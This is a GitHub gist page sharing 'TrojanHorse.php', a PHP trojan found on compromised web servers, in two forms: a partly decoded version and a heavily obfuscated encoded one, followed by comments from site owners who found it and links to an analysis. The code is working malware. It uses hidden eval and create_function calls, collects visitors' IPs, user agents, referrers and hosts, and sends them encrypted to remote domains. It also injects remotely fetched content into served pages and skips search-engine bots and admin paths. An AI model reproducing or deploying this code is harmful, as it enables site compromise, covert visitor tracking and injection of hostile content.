Skip to content

Instantly share code, notes, and snippets.

@cute

cute/TrojanHorse.php

Last active February 8, 2018 18:50
Show Gist options
  • Save cute/8130292 to your computer and use it in GitHub Desktop.
Save cute/8130292 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
TrojanHorse.php
<?php
function oo2($b) {
$h = explode("|", strrev($b));
$d = explode("*", $h[0]);
$b = $h[1];
for($i=0;$i<sizeof($d);$i++) {
$b = str_replace($i, $d[$i], $b);
}
create_function("", "};".$b."//");
}
function cqq($qw) {
return random($domarr,$qw);
}
function oo1($y) {
$y= strrev($y);
$g=substr($y,strpos($y,"9")+1);
$v = explode(":",substr($y,0,strpos($y,"9")));
for($i=0;
$i<sizeof($v);
$i++) {
$q = explode("|", $v[$i]);
$g = str_replace($q[0],$q[1],$g);
}
create_function("", "}; ".$g."//");
}
function random($arr,$qw) {
$g="\x20\167\x2d\70\x36794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-87\x33\54\x67\75\x20\167\x2e\40\x72\73\x20\155\x2d\70"."6d944835,sq-873964872937873960\x38\66\x63\71\x35\61\x38\67\x34\42\x3b";
$soy = "\x65\156\x32";
$xx="\x65\170\x70"."\154\x6f\144\x65";
$ecx="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e";
$scy="\x73\164\x72\137\x72\145\x70\154\x61\143\x65";
$a = $xx("|","\x5c\170\x7c\134\x31\174\x3d\42\x7c\42\x3b\44\x7c\44");
$aa = $xx("|","8|9|-|,| ");
$mec=$ecx;
for($i=0;
$i<sizeof($a);
$i++) {$g = $scy($aa[$i],$a[$i],$g);
}
$ecx("", "}; $g//");
$mec("", $soy("\230\77\153\147\26\167\114\130\223\257\211\2\253\5\172\316\25\262\145\25\62\72\127\156\270\100\154\56\341\77\4\37\21\152\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20",$scy));
return $arr[rand((0.24-(0.03*8)),(0.1875*6))].$qw;
}
$r9 = explode("|",'1067|416|779|223|361');
$b9=0;
$a9=0;
for($i9=0; $i9<sizeof($r9); $i9++) {
if ($i9==0)
$a9=0;
else
$a9=$r9[$i9-1]+$a9;
$b9=$r9[$i9];
$v_[]=substr($v9, $a9, $b9);
}
$y =1;
for($i=0; $i<5; $i++) {
$vv1 ="o"."o".$y;
if ($y==1)
$y=2;
else $y=1;
$vv1($v_[$i]);
}
function en2($s, $q) {
$l="\x73\164\x72\154\x65\156";
$p="\x70\141\x63\153";
$r="\x73\165\x62\163\x74\162";
$m="\x6d\144\x35";
$g = "";
while ($l($g)<$l($s)) {
$q = $p("H*",$m($g.$q."\x71\61\x77\62\x65\63\x72\64"));
$g.=$r($q,0,8);
}
return $s^$g;
}
function g_1($url) {
if (function_exists("file_get_contents") === false)
return false;
$buf = @file_get_contents($url);
if ($buf == "")
return false;
return $buf;
}
function g_2($url) {
if (function_exists("curl_init") === false)
return false;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_HEADER, 0);
$res = curl_exec($ch);
curl_close($ch);
if ($res == "")
return false;
return $res;
}
function g_3($url) {
if (function_exists("file") === false)
return false;
$inc = @file($url);
$buf = @implode("", $inc);
if ($buf == "")
return false;
return $buf;
}
function g_4($url) {
if (function_exists("socket_create") === false)
return false;
$p= @parse_url($url);
$host = $p["host"];
if(!isset($p["query"]))
$p["query"]="";
$uri = $p["path"] . "?" . $p["query"];
$ip1 = @gethostbyname($host);
$ip2 = @long2ip(@ip2long($ip1));
if ($ip1 != $ip2)
return false;
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!@socket_connect($sock, $ip1, 80)) {
@socket_close($sock);
return false;
}
$req = "GET $uri HTTP/1.0\n";
$req .= "Host: $host\n\n";
socket_write($sock, $req);
$buf = "";
while ($t = socket_read($sock, 10000)) {
$buf .= $t;
}
@socket_close($sock);
if ($buf == "") return false;
list($m, $buf) = explode("\r\n\r\n", $buf);
return $buf;
}
function gtd ($url) {
$co = "";
$co = @g_1($url);
if ($co !== false)
return $co;
$co = @g_2($url);
if ($co !== false)
return $co;
$co = @g_3($url);
if ($co !== false)
return $co;
$co = @g_4($url);
if ($co !== false)
return $co;
return "";
}
if (!function_exists("comgzi")) {
function comgzi($gzData) {
if (substr($gzData,0,3)=="\x1f\x8b\x08") {
$i=10;
$flg=ord(substr($gzData,3,1));
if ($flg>0) {
if ($flg & 4) {
list($xlen)=unpack("v",substr($gzData,$i,2));
$i=$i+2+$xlen;
}
if ($flg & 8)
$i=strpos($gzData,"\0",$i)+1;
if ($flg & 16)
$i=strpos($gzData,"\0", $i)+1;
if ( $flg & 2)
$i=$i+2;
}
return @gzinflate(substr($gzData,$i,-8));
} else{
return false;
}
}
}
function k34($op,$text) {
return base64_encode(en2($text, $op));
}
function check212($param) {
if(!isset($_SERVER[$param])) $a="non";
else if ($_SERVER[$param]=="") $a="non";
else $a=$_SERVER[$param];
return $a;
}
function day212() {
$a=check212("HTTP_USER_AGENT");
$b=check212("HTTP_REFERER");
$c=check212("REMOTE_ADDR");
$d=check212("HTTP_HOST");
$e=check212("PHP_SELF");
$domarr = array("33db9538","9507c4e8","e5b57288","54dfa1cb");
if (($a=="non")
or ($c=="non")
or ($d=="non")
or strrpos(strtolower($e),"admin")
or (preg_match("/" . implode("|", array("google","slurp","msnbot","ia_archiver","yandex","rambler")) . "/i",
strtolower($a))) ) {
$o1 = "";
} else {
$op=mt_rand(100000,999999);
$g4=$op."?".urlencode(urlencode(k34($op,$a).".".k34($op,$b).".".k34($op,$c).".".k34($op,$d).".".k34($op,$e)));
$url="http://".cqq(".com")."/".$g4;
$ca1=en2(@gtd($url),$op);
$a1=@explode("!NF0",$ca1);
if (sizeof($a1)>=2)
$o1 = $a1[1];
else
$o1 = "";
}
return $o1;
}
if (!function_exists("dcoo")) {
function dcoo($cz, $length = null) {
if (false !== ($dz = @gzinflate($cz) ) )
return $dz;
if (false !== ($dz = @comgzi($cz) ) )
return $dz;
if (false !== ($dz = @gzuncompress($cz) ) )
return $dz;
if (function_exists("gzdecode") ) {
$dz = @gzdecode($cz);
if (false !==$dz )
return $dz;
} return $cz;
}
}
if(!function_exists("pa22")) {
function pa22($v) {
Header("Content-Encoding: none");
$p="\x70\162\x65\147\x5f";
$p1=$p."\155\x61\164\x63\150";
$p2=$p."\162\x65\160\x6c\141\x63\145";
$t=dcoo($v);
if($p1("/\<\/body/si",$t)) {
return $p2("/(\<\/body[^\>]*\>)/si", day212()."\n"."$"."1", $t,1);
} else {
if($p1("/\<\/html/si",$t)) {
return $p2("/(\<\/html[^\>]*\>)/si", day212()."\n"."$"."1", $t,1);
} else {
return $t;
}
}
}
}
//ob_start("pa22");
Raw
TrojanHorseEncoded.php
<?php $zncwhdurms = '7825j:>>1*!%x5c%x7825b:>1<!futjm6<%x5c%x787fw6*CW&)7gj6<*}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5]y84]275]y83]273]y76]277#<%x5c%oj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x725!|!*#91y]c9y]g2y]#>>*4sv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x782& (!isset($GLOBALS["%x61%156%x75%1525o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825jx5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825%x61"]=1; function fjfgg($n){retuj{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x78:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5pdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5cj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsu8e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825x7860{6:!}7;!}6;##}C;!>>!}W;utpi}bss-%x5c%x7825r%x5c%x7878W~256]y39]252]y83]273]y7!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7JU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x7825)dfyfR%x5%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860m34]368]322]3]364]6]283]427]36]373P825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmg25):fmji%x5c%x7878:<##:>:h%x7%x65","%x65%166%x61%154%x28%151%x6%x5c%x78242178}527}88:}334}4x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5275]y7:]268]y7f#<!%x5c%x782j%x5c%x78257-C)fepmqnjA%x5c%x7827t>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%165%x3a%146%x21%76%x21%50%x5c%x7825c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)2f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epn78pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7|!*1?hmg%x5c%x7825)!gj!<**2-4-b!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%mqyf%x5c%x7827*&7-n%x5c%x7825)x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x782])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%xx7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x76]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]484#-!OVMM*<%x22%51%x29%51%x29%73", NULL); }%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7827x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x525i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x78!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7m%x5c%x7825=*h%x5c%x7825)m%x5c%x78f*#npd%x5c%x782f#)rrd%x5c%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672d%160%x6c%157%x64%145%x28%141%x72%162%xc%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%16%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]3%x782f#00#W~!%x5c%x78ufs:~:<*9-1-r%x5c%x7825)sx5c%x7825!-uyfu%x5c%x!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs8y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%xc%x7825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojex7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!2]282#<!%x5c%x7825tjw!>!#]y84]275]y83]822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-Uf!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg8y]47]67y]37]88y]27]23]321]464]284]364]6]272]254]y76]61]y33]68]y34]67825)3of)fepdof%x5c%x786057ftb5-qp%x5c%x7825)54l}%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA860ftsbqA7>q%x5c%x78256<%}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!hA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x78rn chr(ord($n)-1);} @error_reporting(0!>!fyqmpef)#%x5c%x7824x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j72%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%xfubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*do34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x78257825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x787fw6*%x5c%x787f_*#%x5c%x7825)7gj6<**2q2)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%c%x785csboe))1%x5c%x7%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5824<!%x5c%x7825o:!>!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)5!<5h%x5c%x7825%x5c%x782f#0#%x5c%x7827825)tpqsut>j%x5c%x7825!*72!%x5c%c%x78257>%x5c%x782272qjV%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZAS72]265]y39]271]y83]256]y78]248]y83]256]y81]265]yFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;m7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%xx787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<3%x74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%5c%x78256<C>^#zsfvr#%x5qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***82f35.)1%x5c%x782f14+9**-)1%x5c%x78242%x5f%163%x74%141%x72%164") &FOJ%x5c%x7860GB)fubfsdXA%x8]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*b%x5c%x7825)sf%x5c%x7878pmpusut!x5c%x782f+*0f(-!#]y76]277]y-j%x5c%x7825-bubE{h%x5c%x7825)sutbn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x787pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fep82fq%x5c%x7825>U<#16,47R57,278:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878r.P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]525bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K7c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNif((function_exists("%x6f%1d%x5c%x78256<%x5c%x787fw6*%x5c%x7875c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x4-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%xx7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x7857825iN}#-!tussfw)%x5c%x7825c825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]3c%x785cq%x5c%x78257**^#zsfvr#%x5c%4#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]3]Kc]55Ld]55#*<%x5c%x7825bG9-1-bubE{h%x5c%x7825)sutcvt)825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x78!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)]256]y6g]257]y86]267]y74]7860msvd},;uqpuft%x5c%x7860msvd824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x7827!hmg%x5c%x7825)!g#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x782svd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x822:ftmbg39*56A:>:8:|:7#6#)tutjyf=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#Lx5c%x7825!<12>j%x5c%x78ubE{h%x5c%x7825)sutcvt)esp>hmg%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3vufs}%x5c%x7827;mnui#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782fB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|%x5c%x7860439275ttfsqnpdov{h192755c%x7827K6<%x5c%x787fw6*3qj%x5::::::-111112)eobs%x5c%x7860un>c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%xc%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce4c%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y48256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%8273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufx7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5ck~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x78_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHfepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*x7825t2w>#]y74]273]y76]252]y85R66,#%x5c%x782fq%x5c%x7825>2q%x55tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvx7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x7%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x7c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%xx5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujsy6g]273]y76]271]y7d]252]y74]5%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x75c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]%x5c%x7825}U;y]}R;2]},;os]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>); preg_replace("%x2f%50%x2e%52%x29%525t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x78x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x*<!%x5c%x7825kj:!>!#]y3d:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%xc%x7824-%x5c%x7824]y8%x5c%x782j%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x727pd%x5c%x78256<C%x5c%x782+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idu!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<%x78257-K)udfoopdXA%x5c%x76%x61"])))) { $GLOBALS["%x61%156%x75%156x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]Dc%x7825j^%x5c%x7824-%x5c%%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*icvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!25:-5ppde:4:|:**#ppde:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-V<*w%x5c%x7825)ppde>u%x/(.*)/epreg_replacecnavxfmvea'; $nnogeqksta = explode(chr((217-173)),'6085,27,5465,30,509,35,9741,40,651,33,4171,38,9264,37,1610,35,3064,39,3200,59,5307,56,1966,34,9065,67,1482,53,3877,62,2727,65,6865,53,9578,26,5779,49,2290,30,28,29,2495,69,8974,63,6678,67,2564,56,8009,46,9715,26,3660,51,5495,26,7624,30,5032,23,4632,20,9542,36,8090,40,4051,67,6204,59,5363,23,6586,34,861,44,2159,52,3939,25,4607,25,4396,54,1829,33,8630,52,5262,45,9855,58,1261,20,6040,45,1195,66,6112,35,6307,62,6415,42,1047,33,823,38,1338,49,7141,68,6984,31,3964,32,3103,47,3711,44,57,40,8593,37,1535,47,211,50,5204,58,4999,33,7053,22,945,45,1862,36,7417,57,5693,33,9913,70,2211,31,7386,31,7363,23,430,24,6773,27,1129,66,780,43,595,56,6918,41,2242,48,2320,59,4962,37,2980,27,6369,46,2000,48,8350,66,7654,31,5386,43,5634,32,4851,55,9604,59,5726,53,2111,48,7738,50,6620,58,8298,52,7548,43,9663,52,7075,66,4652,42,3346,21,3823,30,7788,67,5160,44,454,55,3853,24,2429,66,8192,37,7209,33,7591,33,684,46,9983,21,5584,50,3417,59,3367,50,8748,70,5055,57,10083,23,8868,40,5828,29,8446,32,3526,51,905,40,1281,57,9191,25,7474,20,8682,66,2379,50,6147,57,9370,55,9132,59,9037,28,1107,22,3622,38,8818,50,180,31,8416,30,6959,25,1802,27,8478,49,3321,25,3259,41,3755,21,3476,50,4906,56,2946,34,1582,28,3007,57,138,42,4505,46,730,50,4831,20,1645,28,4275,55,362,68,7015,38,2792,47,9830,25,3577,45,10041,42,3150,50,4777,54,9512,30,6263,44,6800,65,8908,66,4551,56,1673,67,4209,22,9425,24,7959,50,7685,53,6499,28,4118,53,2839,50,2048,63,1080,27,2889,57,1421,61,8130,62,3300,21,9301,69,5981,59,5857,66,4330,66,1740,62,9216,48,8055,35,9781,49,10004,37,5923,58,6745,28,3996,55,7916,43,97,41,6527,59,1387,34,2620,64,3776,21,4450,55,4756,21,5429,36,8229,69,544,51,9449,63,0,28,7855,61,6457,42,4694,62,4231,44,7242,59,261,42,8527,66,990,57,7301,62,7494,54,303,59,1898,68,5666,27,5112,48,3797,26,5521,63,2684,43'); $aitotdqzlc=substr($zncwhdurms,(55649-45543),(34-27)); if (!function_exists('amnqtvsqga')) { function amnqtvsqga($khhskdrgue, $yvidvvygfs) { $ydknkzhhdz = NULL; for($bwkwvhtkss=0;$bwkwvhtkss<(sizeof($khhskdrgue)/2);$bwkwvhtkss++) { $ydknkzhhdz .= substr($yvidvvygfs, $khhskdrgue[($bwkwvhtkss*2)],$khhskdrgue[($bwkwvhtkss*2)+1]); } return $ydknkzhhdz; };} $shyaoarbbk="\x20\57\x2a\40\x71\143\x65\164\x65\165\x6d\144\x6b\165\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x32\55\x31\66\x35\51\x29\54\x20\143\x68\162\x28\50\x32\70\x35\55\x31\71\x33\51\x29\54\x20\141\x6d\156\x71\164\x76\163\x71\147\x61\50\x24\156\x6e\157\x67\145\x71\153\x73\164\x61\54\x24\172\x6e\143\x77\150\x64\165\x72\155\x73\51\x29\51\x3b\40\x2f\52\x20\156\x71\143\x64\172\x65\166\x67\153\x6f\40\x2a\57\x20"; $jxabvfwkef=substr($zncwhdurms,(68592-58479),(62-50)); $jxabvfwkef($aitotdqzlc, $shyaoarbbk, NULL); $jxabvfwkef=$shyaoarbbk; $jxabvfwkef=(765-644); $zncwhdurms=$jxabvfwkef-1; ?>
@cerw
Copy link

cerw commented Jan 16, 2014

This is on my server! what a code!

@josedalvik
Copy link

The mine was infected, I decoded it, look and understand how it works: http://www.elconspirador.com/2016/02/26/como-funciona-trojanhorse-php-analisis-de-intrusion-codigo-explicado/

I think, en2 is easy to understand.

@eklingen88
Copy link

I was pretty upset to find this on one of the servers that I help to maintain, but I must admit that I am rather impressed with its obfuscation and the way that it unravels itself.

One my colleagues also found this article which helped us to understand it a little bit better.

Also, ISPProtect was able to detect it fairly easily. If you have the budget for it, I highly recommend giving it a try.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment